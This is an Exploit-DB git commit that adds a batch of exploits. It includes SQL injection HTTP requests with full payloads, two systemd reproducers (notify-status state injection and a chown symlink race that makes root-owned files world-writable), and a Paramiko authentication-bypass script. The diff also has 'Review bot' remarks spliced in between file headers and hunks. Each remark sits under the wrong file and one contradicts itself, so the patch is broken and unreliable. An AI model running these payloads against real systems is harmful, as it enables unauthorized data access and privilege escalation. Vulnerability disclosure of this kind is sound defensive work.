From 15b77b5965340eb61d5c0805970ccc43c72e8bef Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 30 Oct 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-10-30 33 changes to exploits/shellcodes Navicat 12.0.29 - 'SSH' Denial of Service (PoC) AlienIP 2.41 - Denial of Service (PoC) Local Server 1.0.9 - Denial of Service (PoC) systemd - reexec State Injection systemd - chown_one() can Dereference Symlinks ASRock Drivers - Privilege Escalation Modbus Slave 7.0.0 - Denial of Service (PoC) School Equipment Monitoring System 1.0 - 'login' SQL Injection Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC) Paramiko 2.4.1 - Authentication Bypass Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection Grapixel New Media 2 - 'pageref' SQL Injection Library Management System 1.0 - 'frmListBooks' SQL Injection Open Faculty Evaluation System 7 - 'batch_name' SQL Injection Card Payment 1.0 - Cross-Site Request Forgery (Update Admin) MTGAS MOGG Web Simulator Script - SQL Injection Aplaya Beach Resort Online Reservation System 1.0 - SQL Injection / Cross-Site Request Forgery Curriculum Evaluation System 1.0 - SQL Injection Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection School Event Management System 1.0 - SQL Injection School Event Management System 1.0 - Arbitrary File Upload School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin) School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin) School Attendance Monitoring System 1.0 - Arbitrary File Upload School Attendance Monitoring System 1.0 - SQL Injection PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection RhinOS CMS 3.x - Arbitrary File Download E-Negosyo System 1.0 - SQL Injection SaltOS Erp Crm 3.1 r8126 - SQL Injection SaltOS Erp Crm 3.1 r8126 - SQL Injection (2) SaltOS Erp Crm 3.1 r8126 - Database File Download K-iwi Framework 1775 - SQL Injection --- exploits/aspx/webapps/45706.vb | 55 +++ exploits/linux/dos/45714.c | 159 ++++++++ 
exploits/linux/dos/45715.txt | 151 ++++++++ exploits/linux/remote/45712.py | 31 ++ exploits/php/webapps/45703.txt | 140 +++++++ exploits/php/webapps/45704.txt | 24 ++ exploits/php/webapps/45707.txt | 147 ++++++++ exploits/php/webapps/45713.txt | 37 ++ exploits/php/webapps/45717.txt | 11 + exploits/php/webapps/45718.txt | 56 +++ exploits/php/webapps/45719.txt | 119 ++++++ exploits/php/webapps/45720.txt | 73 ++++ exploits/php/webapps/45721.txt | 43 +++ exploits/php/webapps/45722.txt | 108 ++++++ exploits/php/webapps/45723.txt | 89 +++++ exploits/php/webapps/45724.txt | 84 +++++ exploits/php/webapps/45725.txt | 84 +++++ exploits/php/webapps/45726.txt | 89 +++++ exploits/php/webapps/45727.txt | 108 ++++++ exploits/php/webapps/45728.txt | 104 +++++ exploits/php/webapps/45729.txt | 62 +++ exploits/php/webapps/45730.txt | 39 ++ exploits/php/webapps/45731.txt | 50 +++ exploits/php/webapps/45733.txt | 39 ++ exploits/php/webapps/45734.txt | 47 +++ exploits/php/webapps/45735.txt | 59 +++ exploits/windows/dos/45716.txt | 503 +++++++++++++++++++++++++ exploits/windows/dos/45732.txt | 27 ++ exploits/windows_x86-64/dos/45705.py | 25 ++ exploits/windows_x86-64/dos/45708.py | 22 ++ exploits/windows_x86-64/dos/45711.py | 46 +++ exploits/windows_x86-64/local/45709.vb | 57 +++ exploits/windows_x86/local/45710.pl | 43 +++ files_exploits.csv | 33 ++ 34 files changed, 2764 insertions(+) create mode 100644 exploits/aspx/webapps/45706.vb create mode 100644 exploits/linux/dos/45714.c create mode 100644 exploits/linux/dos/45715.txt create mode 100755 exploits/linux/remote/45712.py create mode 100644 exploits/php/webapps/45703.txt create mode 100644 exploits/php/webapps/45704.txt create mode 100644 exploits/php/webapps/45707.txt create mode 100644 exploits/php/webapps/45713.txt create mode 100644 exploits/php/webapps/45717.txt create mode 100644 exploits/php/webapps/45718.txt create mode 100644 exploits/php/webapps/45719.txt create mode 100644 exploits/php/webapps/45720.txt create mode 100644 
exploits/php/webapps/45721.txt
create mode 100644 exploits/php/webapps/45722.txt
create mode 100644 exploits/php/webapps/45723.txt
create mode 100644 exploits/php/webapps/45724.txt
create mode 100644 exploits/php/webapps/45725.txt
create mode 100644 exploits/php/webapps/45726.txt
create mode 100644 exploits/php/webapps/45727.txt
create mode 100644 exploits/php/webapps/45728.txt
create mode 100644 exploits/php/webapps/45729.txt
create mode 100644 exploits/php/webapps/45730.txt
create mode 100644 exploits/php/webapps/45731.txt
create mode 100644 exploits/php/webapps/45733.txt
create mode 100644 exploits/php/webapps/45734.txt
create mode 100644 exploits/php/webapps/45735.txt
create mode 100644 exploits/windows/dos/45716.txt
create mode 100644 exploits/windows/dos/45732.txt
create mode 100755 exploits/windows_x86-64/dos/45705.py
create mode 100755 exploits/windows_x86-64/dos/45708.py
create mode 100755 exploits/windows_x86-64/dos/45711.py
create mode 100644 exploits/windows_x86-64/local/45709.vb
create mode 100755 exploits/windows_x86/local/45710.pl
diff --git a/exploits/aspx/webapps/45706.vb b/exploits/aspx/webapps/45706.vb
new file mode 100644
index 000000000..f84175413
--- /dev/null
+++ b/exploits/aspx/webapps/45706.vb
@@ -0,0 +1,55 @@
+# Exploit Title: Library Management System 1.0 - 'frmListBooks' SQL Injection
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/janobe
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/librarymanagementsystem.zip
+# Version: 1.0
+# Category: Windows
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-18796
+
+# POC:
+# 1)
+# textSearch System.Windows.Forms.TextBox / [SQL]
+#
+# %' And (SElecT 112 FRom(SELECT CoUNT(*),conCAT((SELecT (ELT(112=112,1))),CONCAT_WS(0x203a20,USEr(),DATABASE(),VERsiON()),FLOOR(RAnD(0)*2))x FRoM INFORmaTION_SCHeMA.PLuGINS GRoUP BY x)a) AnD'%'='
+#
+# https://1.bp.blogspot.com/-8FBYHFTLhhQ/W9YnCQg0nZI/AAAAAAAAENM/St0sn1IYjDs5kTjvYQNtT_mBmOEv-RaIgCLcBGAs/s1600/sql1.png
+#
+#[PATH]/forms/frmListofBooks.vb
+#...
+
+Public Class frmListBooks
+
+ Private Sub frmListBooks_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
+ sql = "SELECT `AccessionNo`, `BookTitle`, `BookDesc` as 'Description', `Author`, `PublishDate`, `BookPublisher`, `Category`,BookType as 'typeOfBooks', `BookPrice` as 'Price', DeweyDecimal " & _
+ ", Status FROM `tblbooks` b, `tblcategory` c WHERE b.`CategoryId`=c.`CategoryId` "
+ reloadDtg(sql, dtgList)
+ End Sub
+
+ Private Sub txtSerach_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
+ sql = "SELECT `AccessionNo`, `BookTitle`, `BookDesc` as 'Description', `Author`, `PublishDate`, `BookPublisher`, `Category`,BookType as 'typeOfBooks', `BookPrice` as 'Price', DeweyDecimal " & _
+ ", Status FROM `tblbooks` b, `tblcategory` c WHERE b.`CategoryId`=c.`CategoryId` AND (`BookTitle` Like '%" & txtSearch.Text & "%' OR `Author` Like '%" & txtSearch.Text & "%' OR `AccessionNo` Like '%" & txtSearch.Text & "%')"
+ reloadDtg(sql, dtgList)
+ End Sub
+
+ Private Sub btnAdd_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnAdd.Click
+ Try
+ If dtgList.CurrentRow.Cells(10).Value = "Available" Then
+ frmBorrow.txtAccesionNumBorrow.Text = dtgList.CurrentRow.Cells(0).Value
+ Me.Close()
+ Else
+ MsgBox("The book is already borrowed.", MsgBoxStyle.Exclamation)
+
+ End If
+ Catch ex As Exception
+
+ End Try
+
+ End Sub
+
+ Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
+ Me.Close()
+ End Sub
+ End Class
\ No newline at end of file
diff --git a/exploits/linux/dos/45714.c b/exploits/linux/dos/45714.c
new file mode 100644
index 000000000..b47fb0a95
--- /dev/null
+++ b/exploits/linux/dos/45714.c
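Review bot: The advisory quotes the vulnerable code but never names the injection point or the fix: in `txtSerach_TextChanged` the raw `txtSearch.Text` is concatenated into three `Like '%...%'` clauses of `sql`, and the remediation a reader of this file needs is a parameterized command with the search text bound as a parameter (and the `%`/`_` LIKE metacharacters escaped), not string concatenation. The classification is also inconsistent: the code is a WinForms desktop application (`System.Windows.Forms.TextBox`, `# Category: Windows`) yet the file is placed under `exploits/aspx/webapps/`, so it will not be found by anyone filtering on platform. A smaller point of style in the quoted code, worth a line in the advisory since it hides failures on the same path, is the empty `Catch ex As Exception` in `btnAdd_Click`.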
@@ -0,0 +1,159 @@
+/*
+[I am sending this bug report to Ubuntu, even though it's an upstream
+bug, as requested at
+https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports
+.]
+
+When systemd re-executes (e.g. during a package upgrade), state is
+serialized into a memfd before the execve(), then reloaded after the
+execve(). Serialized data is stored as text, with key-value pairs
+separated by newlines. Values are escaped to prevent control character
+injection.
+
+Lines associated with a systemd unit are read in unit_deserialize()
+using fgets():
+
+ char line[LINE_MAX], *l, *v;
+ [...]
+ if (!fgets(line, sizeof(line), f)) {
+ if (feof(f))
+ return 0;
+ return -errno;
+ }
+
+LINE_MAX is 2048:
+
+/usr/include/bits/posix2_lim.h:#define LINE_MAX _POSIX2_LINE_MAX
+/usr/include/bits/posix2_lim.h:#define _POSIX2_LINE_MAX 2048
+
+
+When fgets() encounters overlong input, it behaves dangerously. If a
+line is more than 2047 characters long, fgets() will return the first
+2047 characters and leave the read cursor in the middle of the
+overlong line. Then, when fgets() is called the next time, it
+continues to read data from offset 2047 in the line as if a new line
+started there. Therefore, if an attacker can inject an overlong value
+into the serialized state somehow, it is possible to inject extra
+key-value pairs into the serialized state.
+
+A service that has `NotifyAccess != none` can send a status message to
+systemd that will be stored as a property of the service. When systemd
+re-executes, this status message is stored under the key
+"status-text".
+Status messages that are sent to systemd are received by
+manager_dispatch_notify_fd(). This function has a receive buffer of
+size NOTIFY_BUFFER_MAX==PIPE_BUF==4096.
+
+Therefore, a service with `NotifyAccess != none` can trigger this bug.
+
+
+Reproducer:
+
+Create a simple service with NotifyAccess by copying the following
+text into /etc/systemd/system/notify_test.service (assuming that your
+home directory is /home/user):
+
+=========
+[Unit]
+Description=jannh test service for systemd notifications
+
+[Service]
+Type=simple
+NotifyAccess=all
+FileDescriptorStoreMax=100
+User=user
+ExecStart=/home/user/test_service
+Restart=always
+
+[Install]
+WantedBy=multi-user.target
+=========
+
+Create a small binary that sends an overlong status when it starts up:
+
+=========
+*/
+
+user@ubuntu-18-04-vm:~$ cat test_service.c
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main(void) {
+ int sock = socket(AF_UNIX, SOCK_DGRAM, 0);
+ if (sock == -1) err(1, "socket");
+ struct sockaddr_un addr = {
+ .sun_family = AF_UNIX,
+ .sun_path = "/run/systemd/notify"
+ };
+ if (connect(sock, (struct sockaddr *)&addr, sizeof(addr))) err(1, "connect");
+
+ char message[0x2000] = "STATUS=";
+ memset(message+7, 'X', 2048-1-12);
+ strcat(message, "main-pid=13371337");
+ struct iovec iov = {
+ .iov_base = message,
+ .iov_len = strlen(message)
+ };
+ union {
+ struct cmsghdr cmsghdr;
+ char buf[CMSG_SPACE(sizeof(struct ucred))];
+ } control = { .cmsghdr = {
+ .cmsg_level = SOL_SOCKET,
+ .cmsg_type = SCM_CREDENTIALS,
+ .cmsg_len = CMSG_LEN(sizeof(struct ucred))
+ }};
+ struct ucred *ucred = (void*)(control.buf + CMSG_ALIGN(sizeof(struct cmsghdr)));
+ ucred->pid = getpid();
+ ucred->uid = getuid();
+ ucred->gid = getgid();
+ struct msghdr msghdr = {
+ .msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = &control,
+ .msg_controllen = sizeof(control)
+ };
+ if (sendmsg(sock, &msghdr, 0) != strlen(message)) err(1, "sendmsg");
+
+ while (1) pause();
+}
+
+/*
+user@ubuntu-18-04-vm:~$ gcc -o test_service test_service.c
+user@ubuntu-18-04-vm:~$
+=========
+
+Install the service, and start it. Then run strace against systemd,
+and run:
+
+=========
+root@ubuntu-18-04-vm:~# systemctl daemon-reexec
+root@ubuntu-18-04-vm:~# systemctl stop notify_test.service
+=========
+
+The "stop" command hangs, and you'll see the following in strace:
+
+=========
+root@ubuntu-18-04-vm:~# strace -p1 2>&1 | grep 13371337
+openat(AT_FDCWD, "/proc/13371337/stat", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
+kill(13371337, SIG_0) = -1 ESRCH (No such process)
+kill(13371337, SIGTERM) = -1 ESRCH (No such process)
+=========
+
+This demonstrates that systemd's representation of the service's PID
+was clobbered by the status message.
+
+
+This can in theory, depending on how the active services are
+configured and some other things, also be used to e.g. steal file
+descriptors that other services have stored in systemd (visible in
+the serialized representation as "fd-store-fd").
+
+This isn't the only place in systemd that uses fgets(); other uses of
+fgets() should probably also be audited and potentially replaced with
+a safer function.
+*/
\ No newline at end of file
diff --git a/exploits/linux/dos/45715.txt b/exploits/linux/dos/45715.txt
new file mode 100644
index 000000000..5c71f2a14
--- /dev/null
+++ b/exploits/linux/dos/45715.txt
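Review bot: Unlike every other file in this commit, this entry carries no exploit-db metadata header (Exploit Title, Date, Author, Vendor Homepage, affected Version, Tested on, CVE) before the report text, so neither the affected systemd range nor the fixed release is recorded anywhere in the file; the same is true of `exploits/linux/dos/45715.txt`. The six `#include` lines of the embedded `test_service.c` (and the five in `exchange.c` in 45715) carry no header names on this page; if that is the committed content rather than an artifact of how the report was pasted, the reproducer does not compile and the names should be restored from the original report. The `.c` extension is also misleading for a file that is mostly prose inside a `/* ... */` comment wrapped around one C program. A one-line remediation note would make the entry useful to defenders, along the lines the report itself gives: `/* Fix: replace the fgets() read in unit_deserialize() with a line reader that rejects or fully consumes lines longer than LINE_MAX */`.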
@@ -0,0 +1,151 @@
+[I am sending this bug report to Ubuntu, even though it's an upstream
+bug, as requested at
+https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports
+.]
+
+When chown_one() in the recursive chown logic decides that it has to change
+ownership of a directory entry, it first changes ownership as follows:
+
+ if (name)
+ r = fchownat(fd, name, uid, gid, AT_SYMLINK_NOFOLLOW);
+ else
+ r = fchown(fd, uid, gid);
+ if (r < 0)
+ return -errno;
+
+So far, this looks good. But then this happens:
+
+ /* The linux kernel alters the mode in some cases of chown(). Let's undo this. */
+ if (name) {
+ if (!S_ISLNK(st->st_mode))
+ r = fchmodat(fd, name, st->st_mode, 0);
+ else /* There's currently no AT_SYMLINK_NOFOLLOW for fchmodat() */
+ r = 0;
+ } else
+ r = fchmod(fd, st->st_mode);
+
+This is dangerous, especially in the case where `name != NULL`.
+
+First off: I don't think that the overall objective of this code block makes
+sense. Yes, the kernel sometimes changes the mode when ownership is changed -
+but that's only for set-UID binaries and set-GID binaries (but not
+set-GID directories).
+I'm pretty sure that setuid/setgid binaries aren't supposed to appear in these
+directories anyway.
+
+The problem here is that, as the comment explains,
+`fchmodat(fd, name, st->st_mode, 0)` follows symlinks. The fchmodat() call is
+guarded by a `S_ISLNK(st->st_mode)` check, but that's obviously racy and
+therefore doesn't actually help.
+
+My recommended fix is to just remove the offending code block. If, for some
+crazy reason, you actually want to support changing the ownership of
+setuid/setgid binaries, an alternative might be to do something like this:
+
+ int fd2 = openat(fd, name, O_PATH|O_NOFOLLOW|O_CLOEXEC);
+ if (fd2 >= 0) {
+ fchmod(fd2, st->st_mode);
+ close(fd2);
+ }
+
+To reproduce, as root, create a service with "Restart=always",
+"StartLimitIntervalSec=0", "StateDirectory=test_service" and "User=user" (where
+"user" is the name of an unprivileged account). Point "ExecStart" at a binary
+that immediately exits:
+
+========
+int main(void) {
+ return 0;
+}
+========
+
+Then start the service.
+
+Next, as the user the service is running as, create some entries in
+/var/lib/test_service:
+
+========
+user@ubuntu-18-04-vm:~$ cd /var/lib/test_service/
+user@ubuntu-18-04-vm:/var/lib/test_service$ touch foo
+user@ubuntu-18-04-vm:/var/lib/test_service$ chmod 0666 foo
+user@ubuntu-18-04-vm:/var/lib/test_service$ ln -s /etc/hostname foo2
+user@ubuntu-18-04-vm:/var/lib/test_service$ ln foo foo_link
+user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la
+total 8
+drwxr-xr-x 2 user user 4096 Okt 8 16:42 .
+drwxr-xr-x 67 root root 4096 Okt 8 15:30 ..
+-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo
+lrwxrwxrwx 1 user user 13 Okt 8 16:23 foo2 -> /etc/hostname
+-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo_link
+========
+
+Create and run a helper that continuously switches "foo" and "foo2" with each
+other:
+
+========
+user@ubuntu-18-04-vm:~$ cat exchange.c
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+int main(int argc, char **argv) {
+ char *base = argv[1], *p1 = argv[2], *p2 = argv[3];
+ if (chdir(base)) err(1, "chdir");
+ while (1) {
+ if (syscall(__NR_renameat2, AT_FDCWD, p1, AT_FDCWD, p2, 2))
+ perror("renameat");
+ }
+}
+user@ubuntu-18-04-vm:~$ gcc -o exchange exchange.c -O2
+user@ubuntu-18-04-vm:~$ ./exchange /var/lib/test_service foo foo2
+========
+
+Change ownership of "foo_link" and the test_service directory to trigger the
+permission fixup logic when the service restarts the next time:
+
+========
+user@ubuntu-18-04-vm:/var/lib/test_service$ chown user:cdrom foo_link .
+========
+
+Check whether it worked:
+
+========
+user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la /etc/hostname .
+-rw-r--r-- 1 root root 16 Jul 3 19:20 /etc/hostname
+
+.:
+total 8
+drwxr-xr-x 2 user user 4096 Okt 8 16:45 .
+drwxr-xr-x 67 root root 4096 Okt 8 15:30 ..
+lrwxrwxrwx 1 user user 13 Okt 8 16:23 foo -> /etc/hostname
+-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo2
+-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo_link
+========
+
+If it didn't work (as in this example), retry the chown a few times. After a few
+times, you should see this:
+
+========
+user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la /etc/hostname .
+-rw-rw-rw- 1 root root 16 Jul 3 19:20 /etc/hostname
+
+.:
+total 8
+drwxr-xr-x 2 user user 4096 Okt 8 16:46 .
+drwxr-xr-x 67 root root 4096 Okt 8 15:30 ..
+-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo
+lrwxrwxrwx 1 user user 13 Okt 8 16:23 foo2 -> /etc/hostname
+-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo_link
+========
+
+
+
+Another thing that might also go wrong, but that I haven't tested, is the
+interaction with the mount.ecryptfs_private helper that comes with ecryptfs.
+As far as I can tell, an attacker would be able to use mount.ecryptfs_private to
+mount an ecryptfs inside the StateDirectory. This ecryptfs instance could then
+function similar to a bind mount, causing systemd to change the ownership of
+files that are e.g. in /etc. You might want to ensure that no files or
+directories you access are located on an ecryptfs filesystem.
\ No newline at end of file
diff --git a/exploits/linux/remote/45712.py b/exploits/linux/remote/45712.py
new file mode 100755
index 000000000..d58809319
--- /dev/null
+++ b/exploits/linux/remote/45712.py
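Review bot: The entry is filed under `exploits/linux/dos/`, but the outcome the reproducer shows is `-rw-rw-rw- 1 root root 16 Jul 3 19:20 /etc/hostname`, i.e. an unprivileged service user getting root-owned files outside its StateDirectory made world-writable through a symlink race in `chown_one()`; that is a local privilege-escalation primitive, not a denial of service, and the commit's own title ("chown_one() can Dereference Symlinks") says as much. It should be placed under `exploits/linux/local/` with a header line such as `# Category: Local`, so that anyone triaging by impact does not dismiss it. The file also has no metadata header at all, which the note on `exploits/linux/dos/45714.c` already raises for both files. The remediation the reporter gives, dropping the `fchmodat()` fixup or doing it through an `O_PATH|O_NOFOLLOW` descriptor, is the line a defender needs and would be worth restating at the top of the file.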
@@ -0,0 +1,31 @@
+# Exploit Title: Paramiko 2.4.1 - Authentication Bypass
+# Date: 2018-10-27
+# Exploit Author: Adam Brown
+# Vendor Homepage: https://www.paramiko.org
+# Software Link: https://github.com/paramiko/paramiko/tree/v1.15.2
+# Version: < 1.17.6, 1.18.x < 1.18.5, 2.0.x < 2.0.8, 2.1.x < 2.1.5, 2.2.x < 2.2.3, 2.3.x < 2.3.2, and 2.4.x < 2.4.1
+# Tested on: Multiple
+# CVE : CVE-2018-7750
+
+# This PoC is based on discussions found at the following github issue:
+# https://github.com/paramiko/paramiko/issues/1175
+# TLDR, Paramiko doesn't check if the client has completed the authentication step
+# before allowing the client to open channels. The PoC below connects to an SFTP
+# server, and lists the root directory without authenticating. Slight modification
+# is required if you want to open an SSH channel.
+
+#!/usr/bin/python
+import paramiko
+
+host = '127.0.0.1'
+port = 22
+
+trans = paramiko.Transport((host, port))
+trans.start_client()
+
+# If the call below is skipped, no username or password is required.
+# trans.auth_password('username', 'password')
+
+sftp = paramiko.SFTPClient.from_transport(trans)
+print(sftp.listdir('/'))
+sftp.close()
\ No newline at end of file
diff --git a/exploits/php/webapps/45703.txt b/exploits/php/webapps/45703.txt
new file mode 100644
index 000000000..d30dddff5
--- /dev/null
+++ b/exploits/php/webapps/45703.txt
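Review bot: The `#!/usr/bin/python` line is at line 17, after the comment header, so it is not a shebang; the file is committed with mode 100755, and executing it directly will fail with ENOEXEC (or, under a shell that falls back to interpreting it, stop at `import paramiko`). Move it to line 1 or drop it and document running the script with an explicit interpreter. The header contradicts itself: the title names `Paramiko 2.4.1`, but the `# Version:` line lists `2.4.x < 2.4.1` as affected, which makes 2.4.1 the first fixed 2.4 release, and `# Software Link:` points at the `v1.15.2` tree rather than any affected tag; the title should give the affected range and the link an affected version. It would also help to state that the vulnerable component is the paramiko-based SSH/SFTP *server* (this script is only the client that exercises it) and that the mitigation is upgrading the server to at least the fixed releases listed on the `# Version:` line.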
@@ -0,0 +1,140 @@
+# Exploit Title: Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://openfacultyeval.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/openfacultyeval/files/feedback_php5_6.zip/download
+# Version: Php 5.6
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+/[PATH]/submit_feedback.php
+#....
+#17 if(isset($_POST['submit']))
+#18 {
+#19 //feedback no
+#20 $check_feedback_no="select * from batch_master where batch_id='".$_POST['']."'";
+#21 $res_feedback_no=mysql_query($check_feedback_no) or die(mysql_error());
+#22 $result=mysql_fetch_array($res_feedback_no);
+#23
+#24
+#25 $sql="select * from feedback_master where roll_no='".$_POST['roll_no']."' and b_id='".$_POST['b_name']."' and f_id='".$_POST['fac_name']."' and sub_id='".$_POST['sub_name']."' and sem_id='".$_POST['sem_name']."' and batch_id='".$_POST['batch_name']."' and division_id='".$_POST['division']."' and feedback_no='".$result['feedback_no']."'";
+#26 //echo $sql;
+#27 $res=mysql_query($sql) or die(mysql_error());
+#....
+
+# POC:
+# 1)
+# http://localhost/[PATH]/submit_feedback.php
+#
+POST /[PATH]/submit_feedback.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 282
+batch_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 01:02:53 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 235
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/submit_feedback.php
+#
+POST /[PATH]/submit_feedback.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 278
+b_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 01:15:30 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 1204
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 3)
+# http://localhost/[PATH]/submit_feedback.php
+#
+POST /[PATH]/submit_feedback.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 280
+sem_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 01:19:57 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 1202
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 4)
+# http://localhost/[PATH]/submit_feedback.php
+#
+POST /[PATH]/submit_feedback.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 280
+division=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 01:23:11 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 1202
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 5)
+# http://localhost/[PATH]/submit_feedback.php
+#
+POST /[PATH]/submit_feedback.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 279
+roll_no=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 01:29:20 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 1203
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45704.txt b/exploits/php/webapps/45704.txt
new file mode 100644
index 000000000..8b37d0c4e
--- /dev/null
+++ b/exploits/php/webapps/45704.txt
